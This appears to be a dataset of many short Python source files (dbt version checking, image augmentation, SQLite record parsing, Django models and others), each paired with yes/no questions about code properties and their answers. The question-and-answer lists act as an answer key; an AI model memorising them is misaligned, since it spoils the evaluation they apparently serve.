                   " latest version: {}\n\n".format(installed_s, latest_s))

    # Early returns, ordered from "couldn't check" to "out of date".
    if latest is None:
        return ("{}The latest version of dbt could not be determined!\n"
                "Make sure that the following URL is accessible:\n{}"
                .format(version_msg, PYPI_VERSION_URL))
    if installed == latest:
        return "{}Up to date!".format(version_msg)
    if installed > latest:
        return ("{}Your version of dbt is ahead of the latest "
                "release!".format(version_msg))
    return ("{}Your version of dbt is out of date! "
            "You can find instructions for upgrading here:\n"
            "https://docs.getdbt.com/docs/installation"
            .format(version_msg))
__version__ = '0.13.0'

# Resolved once at import time so other modules can read it cheaply.
installed = get_installed_version()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer"... | 3 | core/dbt/version.py | ClaySheffler/dbt |
import random
import numpy as np
from easydict import EasyDict as edict
def get_default_augment_config():
    """Return the default data-augmentation hyper-parameters as an EasyDict."""
    config = edict()
    config.do_aug = True
    config.scale_factor = 0.25
    config.rot_factor = 15
    # NOTE(review): original comment said "15% relative to the patch size"
    # but the value is 0.10 (10%) — confirm which is intended.
    config.center_factor = 0.10
    config.color_factor = 0.2
    config.do_flip_aug = True
    config.rot_aug_rate = 0.6   # probability of applying rotation augmentation
    config.flip_aug_rate = 0.5  # probability of applying flip augmentation
    config.use_color_normalize = True
    # ImageNet channel means/stds scaled to the 0-255 pixel range.
    config.mean = np.array([0.485 * 255, 0.456 * 255, 0.406 * 255])
    config.std = np.array([0.229 * 255, 0.224 * 255, 0.225 * 255])
    config.multiplier = [0.5, 1., 1.5, 2, 2.5]
    return config
def do_augmentation(aug_config):
    """Sample one random set of augmentation parameters.

    Returns (scale, rotation_degrees, center_offset, do_flip, color_scale).
    """
    scale = 1.0 + np.clip(np.random.randn(), -0.5, 1.0) * aug_config.scale_factor

    if random.random() <= aug_config.rot_aug_rate:
        rot = np.clip(np.random.randn(), -1.0, 1.0) * aug_config.rot_factor
    else:
        rot = 0

    center = np.abs(np.clip(np.random.randn(2), -1.0, 1.0)) * aug_config.center_factor
    do_flip = aug_config.do_flip_aug and random.random() <= aug_config.flip_aug_rate

    c_up = 1.0 + aug_config.color_factor
    c_low = 1.0 - aug_config.color_factor
    color_scale = [random.uniform(c_low, c_up) for _ in range(3)]

    return scale, rot, center, do_flip, color_scale
def get_multiplier(img_size, scale_search, patch_size):
"""Computes the sizes of image at different scales
:param img: numpy array, the current image
:returns : list of float. The computed scales
"""
return [x * patch_size / float(img_size) for x in scale_search] | [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excludi... | 3 | common/utility/augment.py | klo9klo9kloi/win_det_heatmaps |
# -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
import scipy.linalg as sl
from odelab.scheme import Scheme
from newton import FSolve, Newton
class EulerMaruyama(Scheme):
    """Implicit Euler–Maruyama step for SDEs with a mass matrix.

    The residual below solves M(t+h,v) - M(t,u) = h*f(t+h,v) + sqrt(h)*G(t,u)*dW
    for v: drift is treated implicitly, noise explicitly.
    """

    def step(self,t,u,h):
        system = self.system
        # One standard Gaussian increment per noise channel.
        noise = np.random.normal(size=[len(system.noise(t,u).T)])
        def residual(v):
            # sqrt(h)/h == 1/sqrt(h): scales the Wiener increment into the
            # divided-difference form of the update equation.
            return (system.mass(t+h,v) - system.mass(t,u))/h - system.deterministic(t+h,v) - np.sqrt(h)/h*np.dot(system.noise(t,u),noise)
        N = Newton(residual)
        ## N.xtol = min(N.xtol, h*1e-4)
        result = N.run(u)
        return t+h, result

    def linstep(self,t,u):
        # Linearly-implicit step: solves (M - h*A) v = M u - h*V(t+h) directly.
        return t+self.h, sl.solve(self.system.mass_mat-self.h*self.system.det_mat, np.dot(self.system.mass_mat,u)-self.h*self.system.V(t+self.h))
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | odelab/scheme/stochastic.py | olivierverdier/odelab |
__author__ = 'erasmospunk'
import unittest
from utils import hash_160_to_address, bc_address_to_hash_160
class UtilTest(unittest.TestCase):
    """hash160 <-> base58 address conversion tests.

    NOTE(review): relies on str.decode('hex') / .encode('hex'), which exist
    only on Python 2.
    """

    def test_hash_160_to_address(self):
        # None and wrongly-sized inputs must map to None.
        self.assertEqual(hash_160_to_address(None), None)
        self.assertEqual(hash_160_to_address('04e9fca1'.decode('hex')), None)
        self.assertEqual(hash_160_to_address('04e9fca1f96e021dfaf35bbea267ec2c60787c1b1337'.decode('hex')), None)
        # A valid 20-byte hash maps to its known base58 address.
        self.assertEqual(hash_160_to_address('1ad3b0b711f211655a01142fbb8fecabe8e30b93'.decode('hex')),
                         '13SrAVFPVW1txSj34B8Bd6hnDbyPsVGa92')

    def test_bc_address_to_hash_160(self):
        # None, empty, and over-long addresses must map to None.
        self.assertEqual(bc_address_to_hash_160(None), None)
        self.assertEqual(bc_address_to_hash_160(''), None)
        self.assertEqual(bc_address_to_hash_160('13SrAVFPVW1txSj34B8Bd6hnDbyPsVGa921337'), None)
        # A valid address decodes back to the original 20-byte hash.
        self.assertEqual(bc_address_to_hash_160('13SrAVFPVW1txSj34B8Bd6hnDbyPsVGa92').encode('hex'),
                         '1ad3b0b711f211655a01142fbb8fecabe8e30b93')

if __name__ == '__main__':
    unittest.main()
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | src/test/test_utils.py | RdeWilde/ion-electrum-server |
from invoke import task
@task
def dist(context):
    """Build a wheel distribution."""
    context.run("python setup.py bdist_wheel")

@task
def test(context):
    """Run the test suite through tox."""
    context.run("tox")
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?... | 3 | tasks.py | mtkennerly/clingy |
# Copyright 2016 Husky Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LogisticRegressionModelReceiver(object):
    """Deserializes logistic-regression training results from the backend.

    NOTE(review): uses xrange, so this module is Python 2 only.
    """

    def __init__(self):
        pass

    @staticmethod
    def register(receiver_map):
        """Register the train-result handler under its protocol key."""
        receiver_map["LogisticRegressionModel#LogisticR_train_py"] = LogisticRegressionModelReceiver.train_receiver

    @staticmethod
    def train_receiver(reply):
        """Decode the model parameters (a list of doubles) from a reply buffer."""
        res = []
        # eat dummy int64 represents the string length
        dummy = reply.load_int64()
        n_params = reply.load_int32()
        for _ in xrange(n_params):
            param_v = reply.load_double()
            res.append(param_v)
        return res
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | python/pyhusky/frontend/library/logistic_regression_receiver.py | husky-team/PyHusky |
import os
import re
from pathlib import Path
from subprocess import PIPE
from typing import List
import pytest
from _pytest.capture import CaptureFixture
from _pytest.monkeypatch import MonkeyPatch
import scanpy
from scanpy.cli import main
HERE = Path(__file__).parent

@pytest.fixture
def set_path(monkeypatch: MonkeyPatch) -> None:
    # Prepend the test-scripts dir to PATH so external subcommands resolve.
    monkeypatch.setenv('PATH', str(HERE / '_scripts'), prepend=os.pathsep)

def test_builtin_settings(capsys: CaptureFixture):
    # The 'settings' subcommand prints the repr of scanpy.settings.
    main(['settings'])
    captured = capsys.readouterr()
    assert captured.out == f'{scanpy.settings}\n'

@pytest.mark.parametrize('args', [[], ['-h']])
def test_help_displayed(args: List[str], capsys: CaptureFixture):
    try:  # -h raises it, no args doesn’t. Maybe not ideal but meh.
        main(args)
    except SystemExit as se:
        assert se.code == 0
    captured = capsys.readouterr()
    assert captured.out.startswith('usage: ')

def test_help_output(set_path: type(None), capsys: CaptureFixture):
    # With the scripts dir on PATH, 'testbin' must appear in the help choices.
    with pytest.raises(SystemExit, match='^0$'):
        main(['-h'])
    captured = capsys.readouterr()
    assert re.search(r'^positional arguments:\n\s+\{settings,[\w,-]*testbin[\w,-]*\}$', captured.out, re.MULTILINE)

def test_external(set_path: type(None)):
    # We need to capture the output manually, since subprocesses don’t write to sys.stderr
    cmd = main(['testbin', '-t', '--testarg', 'testpos'], stdout=PIPE, encoding='utf-8', check=True)
    assert cmd.stdout == 'test -t --testarg testpos\n'

def test_error_wrong_command(capsys: CaptureFixture):
    # Unknown subcommands exit with status 2 and a helpful message.
    with pytest.raises(SystemExit, match='^2$'):
        main(['idonotexist--'])
    captured = capsys.readouterr()
    assert 'No command “idonotexist--”. Choose from' in captured.err
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding ... | 3 | scanpy/tests/test_binary.py | gamazeps/scanpy |
#!/usr/bin/env python3
# Copyright (c) 2009 Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Generate MANIFEST.in file.
"""
import os
import subprocess
SKIP_EXTS = ('.png', '.jpg', '.jpeg')
SKIP_FILES = ('.cirrus.yml', '.travis.yml', 'appveyor.yml')
SKIP_PREFIXES = ('.ci/', '.github/', 'scripts/internal/')
def sh(cmd):
    """Run *cmd* in a shell and return its stripped stdout."""
    output = subprocess.check_output(cmd, shell=True, universal_newlines=True)
    return output.strip()
def main():
    """Print a MANIFEST.in 'include' line for every shippable tracked file."""
    for entry in sh("git ls-files").split('\n'):
        extension = os.path.splitext(entry)[1].lower()
        skip = (entry.startswith(SKIP_PREFIXES)
                or extension in SKIP_EXTS
                or entry in SKIP_FILES)
        if not skip:
            print("include " + entry)
# Script entry point: writes the MANIFEST.in contents to stdout.
if __name__ == '__main__':
    main()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | scripts/internal/generate_manifest.py | zed/psutil |
"""
Basic utility functions
"""
from __future__ import annotations
import json
import docker
from cloudfiles import CloudFiles
import cloudvolume as cv
def sendjsonfile(cloudvolume: cv.CloudVolume,
                 filename: str,
                 content: str
                 ) -> None:
    """Stores a json file using CloudFiles.

    Args:
        cloudvolume: A CloudVolume.
        filename: The filename to use under the CloudVolume's cloudpath.
        content: The JSON content of the file as a string.
    """
    # Round-trip through json to normalize formatting (sorted keys, indented).
    pretty = json.dumps(json.loads(content),
                        sort_keys=True,
                        indent=2,
                        separators=(',', ': '))
    CloudFiles(cloudvolume.cloudpath).put(filename,
                                          pretty,
                                          cache_control='no-cache',
                                          content_type='application/json')
def dockerimageID(imagename: str, tag: str) -> str:
    """Fetches the full image ID from a docker image name and tag.

    Requires the current user to have access to the docker daemon.

    Args:
        imagename: The image name to identify.
        tag: The image tag to identify.

    Returns:
        The SHA hash of the docker image under the image name and tag if
        it can be found.

    Raises:
        ValueError: Unable to find the requested image.
    """
    key = f'{imagename}:{tag}'

    client = docker.from_env()
    images = client.images.list()

    imagelookup = dict()
    for image in images:
        # Bugfix: the inner loop variable used to shadow the `tag` parameter.
        for image_tag in image.tags:
            assert image_tag not in imagelookup, 'multiple images have the same tag?'
            imagelookup[image_tag] = image.id

    if key in imagelookup:
        return imagelookup[key]
    else:
        raise ValueError(f'{key} not found in the current docker image list')
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": tru... | 3 | provenancetoolbox/utils.py | ZettaAI/provenance-toolbox |
from plato.test.base import BaseTestCase
from sqlalchemy.exc import IntegrityError
from plato import db
from plato.model.user import User
from plato.test.utils import add_user
class TestUserModel(BaseTestCase):
    """Unit tests for the User model: creation, uniqueness, auth tokens."""

    def test_user_model(self):
        # A freshly added user carries all expected default fields.
        user = add_user('foo', 'foo@bar.com', 'test_pwd')
        self.assertTrue(user.id)
        self.assertEqual('foo', user.username)
        self.assertEqual('foo@bar.com', user.email)
        self.assertTrue(user.active)
        self.assertTrue(user.created_at)
        self.assertTrue(user.password)
        # Idiom fix: assertFalse instead of assertTrue(x == False).
        self.assertFalse(user.admin)

    def test_add_user_duplicate_username(self):
        # Same username, different email -> IntegrityError on commit.
        add_user('foo', 'foo@bar.com', 'test_pwd')
        duplicate_user = User('foo', 'foo_1@bar.com', 'test_pwd')
        db.session.add(duplicate_user)
        self.assertRaises(IntegrityError, db.session.commit)

    def test_add_user_duplicate_email(self):
        # Same email, different username -> IntegrityError on commit.
        add_user('foo', 'foo@bar.com', 'test_pwd')
        duplicate_user = User('foo_1', 'foo@bar.com', 'test_pwd')
        db.session.add(duplicate_user)
        self.assertRaises(IntegrityError, db.session.commit)

    def test_passwords_are_random(self):
        # Hashing must be salted: identical plaintexts get different hashes.
        user_foo = add_user('foo', 'foo@bar.com', 'test_pwd')
        user_bar = add_user('bar', 'bar@bar.com', 'test_pwd')
        self.assertNotEqual(user_foo.password, user_bar.password)

    def test_encode_auth_token(self):
        user = add_user('test@test.com', 'test@test.com', 'test')
        auth_token = user.encode_auth_token(user.id)
        self.assertTrue(isinstance(auth_token, bytes))

    def test_decode_auth_token(self):
        # Encoding then decoding a token must recover the user's id.
        user = add_user('test@test.com', 'test@test.com', 'test')
        auth_token = user.encode_auth_token(user.id)
        self.assertTrue(isinstance(auth_token, bytes))
        # Bugfix: the original used assertTrue(value, msg), which passed the
        # expected id as the failure *message* and asserted nothing useful.
        self.assertEqual(User.decode_auth_token(auth_token), user.id)
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": ... | 3 | server/plato/test/test_user_model.py | zhlooking/plato |
# coding: utf-8
'''Fauzi, fauzi@soovii.com'''
from flask import Blueprint, request
from flask_restful import Api, reqparse
from app.view import Resource
from app.model import db
# from app.main.model import Main
from sqlalchemy.exc import SQLAlchemyError
from log import logger
mainBlueprint = Blueprint('main', __name__)
api = Api(mainBlueprint)
parser = reqparse.RequestParser()
parser.add_argument('id', type=int)
class Index(Resource):
    """Stub CRUD resource; only GET is implemented."""
    # Get something
    # curl -i http://localhost:5555/
    def get(self):
        logger.debug('main is accessed.')
        return { 'status': True }
    # Create something
    def post(self):
        # Stub: arguments are parsed but nothing is created yet (implicitly returns None).
        args = parser.parse_args()
    # Update something
    def put(self):
        # Stub: arguments are parsed but nothing is updated yet (implicitly returns None).
        args = parser.parse_args()
    # Delete something
    def delete(self):
        # Stub: arguments are parsed but nothing is deleted yet (implicitly returns None).
        args = parser.parse_args()
api.add_resource(Index, '/', '/main/')
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer":... | 3 | app/main/view.py | fauziwei/_flask_ |
# Copyright (c) 2015 Pixomondo
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the MIT License included in this
# distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the MIT License. All rights
# not expressly granted therein are reserved by Pixomondo.
"""
Geometry Output App for Houdini
"""
import sgtk
class GeometryOutputNode(sgtk.platform.Application):
    """Toolkit application wrapping the tk_houdini_geometrynode handler."""

    def init_app(self):
        """Import the app module and construct the node handler."""
        app_module = self.import_module("tk_houdini_geometrynode")
        self.handler = app_module.ToolkitGeometryNodeHandler(self)

    def convert_to_geometry_nodes(self):
        """
        Convert all Shotgun Geometry nodes found in the current Script to regular
        Geometry nodes. Additional toolkit information will be stored in
        user data named 'tk_*'
        """
        self.handler.convert_sg_to_geometry_nodes()

    def convert_from_geometry_nodes(self):
        """
        Convert all regular Geometry nodes that have previously been converted
        from Shotgun Geometry nodes, back into Shotgun Geometry nodes.
        """
        self.handler.convert_geometry_to_sg_nodes()

    def get_nodes(self):
        """
        Returns a list of hou.node objects for each tk alembic node.
        Example usage::
            >>> import sgtk
            >>> eng = sgtk.platform.current_engine()
            >>> app = eng.apps["tk-houdini-geometrynode"]
            >>> tk_alembic_nodes = app.get_nodes()
        """
        self.log_debug("Retrieving tk-houdini-geometrynode nodes...")
        app_module = self.import_module("tk_houdini_geometrynode")
        found_nodes = app_module.ToolkitGeometryNodeHandler.get_all_tk_geometry_nodes()
        self.log_debug("Found %s tk-houdini-geometrynode nodes." % (len(found_nodes),))
        return found_nodes
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answ... | 3 | app.py | ssvfx41/tk-houdini-geometrynode |
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
from typing import Iterable
from .. import QuerySetReader, BaseRecursiveDriver
if False:
from ...proto import jina_pb2
class SliceQL(QuerySetReader, BaseRecursiveDriver):
    """Restrict the size of the ``docs`` to ``k`` (given by the request)
    Example::
        - !ReduceAllDriver
        with:
            granularity_range: [0, 0]
            adjacency_range: [0, 1]
        - !SortQL
        with:
            reverse: true
            field: 'score.value'
            granularity_range: [0, 0]
            adjacency_range: [0, 1]
        - !SliceQL
        with:
            start: 0
            end: 50
            granularity_range: [0, 0]
            adjacency_range: [0, 1]
    `SliceQL` will ensure that only the first 50 documents are returned from this `Pod`
    """

    def __init__(self, start: int, end: int = None, *args, **kwargs):
        """
        :param start: Zero-based index at which to start extraction.
        :param end: Zero-based index before which to end extraction.
            slice extracts up to but not including end. For example, take(1,4) extracts
            the second element through the fourth element (elements indexed 1, 2, and 3).
            When None, extraction runs to the end of the docs.
        """
        super().__init__(*args, **kwargs)
        self._start = int(start)
        # bug fix: `int(end)` raised TypeError whenever the documented
        # default `end=None` was actually used
        self._end = None if end is None else int(end)
        self.is_apply = False

    def _apply_all(self, docs: Iterable['jina_pb2.Document'], *args, **kwargs):
        start = self.start
        end = self.end
        # nothing to trim: the requested slice covers all docs
        if start <= 0 and (end is None or end >= len(docs)):
            return
        # bug fix: guard against `end is None` before int() conversion
        if end is not None:
            del docs[int(end):]
        del docs[:int(start)]
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
... | 3 | jina/drivers/querylang/slice.py | kaushikb11/jina |
import struct

from .varint_parser import parse_varint
def parse_record(stream, column_count):
    """
    Parses SQLite's "Record Format" as mentioned here: https://www.sqlite.org/fileformat.html#record_format
    """
    # The header starts with its own total size; the value is unused here,
    # but the varint must be consumed to advance the stream.
    _number_of_bytes_in_header = parse_varint(stream)
    # One serial type per column, followed by the column values themselves
    # (the stream is positioned at the payload after the header varints).
    serial_types = [parse_varint(stream) for i in range(column_count)]
    return [parse_column_value(stream, serial_type) for serial_type in serial_types]
def parse_column_value(stream, serial_type):
    """Read one column value of the given serial type from *stream*.

    Serial types follow the table in
    https://www.sqlite.org/fileformat.html#record_format
    """
    if serial_type == 0:
        # NULL: encoded in the header only, consumes no payload bytes
        return None
    elif serial_type in (1, 2, 3, 4, 5, 6):
        # Big-endian twos-complement integers of 1/2/3/4/6/8 bytes.
        # (Bug fix: type 1 was previously read unsigned, which is wrong
        # for negative values — the spec says twos-complement.)
        n_bytes = {1: 1, 2: 2, 3: 3, 4: 4, 5: 6, 6: 8}[serial_type]
        return int.from_bytes(stream.read(n_bytes), "big", signed=True)
    elif serial_type == 7:
        # IEEE 754 big-endian 64-bit float
        return struct.unpack(">d", stream.read(8))[0]
    elif serial_type in (8, 9):
        # Integer constants 0 and 1; no payload bytes
        return serial_type - 8
    elif serial_type >= 12 and serial_type % 2 == 0:
        # BLOB of (N-12)/2 bytes
        return stream.read((serial_type - 12) // 2)
    elif serial_type >= 13:
        # Text of (N-13)/2 bytes (returned as raw bytes, as before)
        return stream.read((serial_type - 13) // 2)
    else:
        # Serial types 10 and 11 are reserved by the format.
        raise Exception(f"Unhandled serial_type {serial_type}")
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (... | 3 | starter_templates/sqlite/python/app/record_parser.py | knarkzel/languages |
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 10
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_9_0_0
from isi_sdk_9_0_0.models.network_pools import NetworkPools # noqa: E501
from isi_sdk_9_0_0.rest import ApiException
class TestNetworkPools(unittest.TestCase):
    """NetworkPools unit test stubs"""
    def setUp(self):
        # No fixtures required for these generated stubs.
        pass
    def tearDown(self):
        # Nothing to clean up.
        pass
    def testNetworkPools(self):
        """Test NetworkPools"""
        # FIXME: construct object with mandatory attributes with example values
        # model = isi_sdk_9_0_0.models.network_pools.NetworkPools() # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | isi_sdk_9_0_0/test/test_network_pools.py | mohitjain97/isilon_sdk_python |
import graphene
from graphene import relay
from ....product import models
from ...core.connection import CountableDjangoObjectType
from ...core.scalars import UUID
from ...meta.types import ObjectWithMetadata
# GraphQL type for a single download URL of a digital content item.
# (Documented with comments rather than a docstring: graphene would expose
# a class docstring as the schema description.)
class DigitalContentUrl(CountableDjangoObjectType):
    url = graphene.String(description="URL for digital content.")
    token = graphene.Field(
        UUID, description=("UUID of digital content."), required=True
    )
    class Meta:
        model = models.DigitalContentUrl
        only_fields = ["content", "created", "download_num"]
        interfaces = (relay.Node,)
    @staticmethod
    def resolve_url(root: models.DigitalContentUrl, *_args):
        # Delegates to the model's get_absolute_url().
        return root.get_absolute_url()
# GraphQL type for digital content attached to a product variant; `urls`
# resolves all of its DigitalContentUrl rows.
class DigitalContent(CountableDjangoObjectType):
    urls = graphene.List(
        lambda: DigitalContentUrl,
        description="List of URLs for the digital variant.",
    )
    class Meta:
        model = models.DigitalContent
        only_fields = [
            "automatic_fulfillment",
            "content_file",
            "max_downloads",
            "product_variant",
            "url_valid_days",
            "urls",
            "use_default_settings",
        ]
        interfaces = (relay.Node, ObjectWithMetadata)
    @staticmethod
    def resolve_urls(root: models.DigitalContent, **_kwargs):
        # All related DigitalContentUrl rows (related_name on the model).
        return root.urls.all()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": ... | 3 | saleor/graphql/product/types/digital_contents.py | shannenye/saleor |
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from polyaxon import settings
from polyaxon.logger import logger
from polyaxon.polyboard.logging import V1Log
class PolyaxonHandler(logging.Handler):
    """Logging handler that forwards log records via a `send_logs` callable.

    Records produced by polyaxon's own loggers are skipped (presumably to
    avoid feedback loops), as is everything when the client runs managed.
    """

    def __init__(self, send_logs, **kwargs):
        """
        :param send_logs: callable invoked with a V1Log per emitted record
        :param kwargs: may contain `level`; defaults to the client config level
        """
        self._send_logs = send_logs
        # modernized from explicit logging.Handler.__init__(self, ...)
        super().__init__(
            level=kwargs.get(
                "level", settings.CLIENT_CONFIG.log_level or logging.NOTSET
            ),
        )

    def set_send_logs(self, send_logs):
        """Replace the callable used to ship log records."""
        self._send_logs = send_logs

    def can_record(self, record):
        """Return True unless the record comes from a polyaxon-prefixed logger."""
        # Simplified: the original also compared against "polyaxon" and
        # "polyaxon.cli" explicitly, but both are covered by the prefix check.
        return not record.name.startswith("polyaxon")

    def format_record(self, record):
        """Wrap the record's raw message in a V1Log."""
        return V1Log(value=record.msg)

    def emit(self, record):  # pylint:disable=inconsistent-return-statements
        """Ship the record unless managed mode is on or the record is filtered."""
        if settings.CLIENT_CONFIG.is_managed or not self.can_record(record):
            return
        try:
            return self._send_logs(self.format_record(record))
        except Exception:
            # best-effort: never let logging itself raise
            logger.warning("Polyaxon failed creating log record")
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answ... | 3 | core/polyaxon/client/handlers/handler.py | Ohtar10/polyaxon |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# michael a.g. aïvázis
# orthologue
# (c) 1998-2019 all rights reserved
#
"""
Verify that derived descriptors get harvested correctly
"""
def test():
    """Verify that descriptors harvested via an AttributeClassifier metaclass
    are collected in declaration order and keep their defaults."""
    # get the descriptor package
    from pyre import descriptors
    # get the base metaclass
    from pyre.patterns.AttributeClassifier import AttributeClassifier
    # first, the harvesting metaclass
    class harvester(AttributeClassifier):
        def __new__(cls, name, bases, attributes):
            # the pile
            pile = []
            # harvest every attribute that is a descriptors.stem instance
            for entryName, entry in cls.pyre_harvest(attributes, descriptors.stem):
                # initialize: give the descriptor its attribute name
                entry.bind(name=entryName)
                # and add them to the pile
                pile.append(entry)
            # build the class record
            record = super().__new__(cls, name, bases, attributes)
            # attach the pile
            record.pile = pile
            # and return it
            return record
    # a new descriptor type, derived from the stock decimal descriptor
    class money(descriptors.decimal): pass
    # the client
    class client(metaclass=harvester):
        # some descriptors
        sku = descriptors.int(default=4503)
        cost = money(default=2.34)
    # verify that the descriptors were harvested correctly (and in order)
    assert [entry.name for entry in client.pile] == ['sku', 'cost']
    # get the defaults, coerced through each descriptor's type
    sku = client.sku.coerce(client.sku.default)
    cost = client.cost.coerce(client.cost.default)
    # check the default value
    assert client.sku.default == 4503
    assert client.cost.default == 2.34
    # all done
    return client
# main
if __name__ == "__main__":
# skip pyre initialization since we don't rely on the executive
pyre_noboot = True
# do...
test()
# end of file
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | tests/pyre/descriptors/inheritance.py | lijun99/pyre |
# -*- coding: utf-8 -*-
from django.db import models
from apps.accounts.models.choices import Platform
from apps.accounts.models.managers.phone_device import PhoneDeviceManager
from django.utils.translation import ugettext_lazy as _
from apps.contrib.models.mixins import UUIDPrimaryKeyModelMixin, TimeStampedModelMixin
class PhoneDevice(UUIDPrimaryKeyModelMixin, TimeStampedModelMixin):
    """A phone/device record optionally tied to a User (table `phone_devices`)."""
    # Device identifier/token; optional, but indexed for fast lookup.
    token = models.TextField(
        verbose_name=_('Device ID'),
        db_index=True,
        blank=True,
        null=True,
    )
    # Platform the device runs on; choices come from the Platform enum.
    platform = models.CharField(
        choices=Platform.choices(),
        max_length=10,
    )
    # Human-readable device model, optional.
    model_name = models.CharField(
        max_length=50,
        verbose_name=_('Model Name'),
        blank=True,
        null=True,
    )
    is_active = models.BooleanField(
        verbose_name=_('Is active'),
        default=True,
    )
    # Owning user; deleting the user cascades to their devices.
    user = models.ForeignKey(
        'accounts.User',
        on_delete=models.CASCADE,
        related_name='devices',
        blank=True,
        null=True,
    )
    objects = PhoneDeviceManager()
    def __str__(self):
        return '{token} - {user}'.format(
            token=self.token,
            user=self.user,
        )
    class Meta:
        db_table = 'phone_devices'
        verbose_name = _('Phone Device')
        verbose_name_plural = _('Phone Devices')
        ordering = ['created_at']
        app_label = 'accounts'
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": true
},
{
... | 3 | apps/accounts/models/phone_device.py | victoraguilarc/agendas |
# Generates comments with the specified indentation and wrapping-length
def generateComment(comment, length=100, indentation=""):
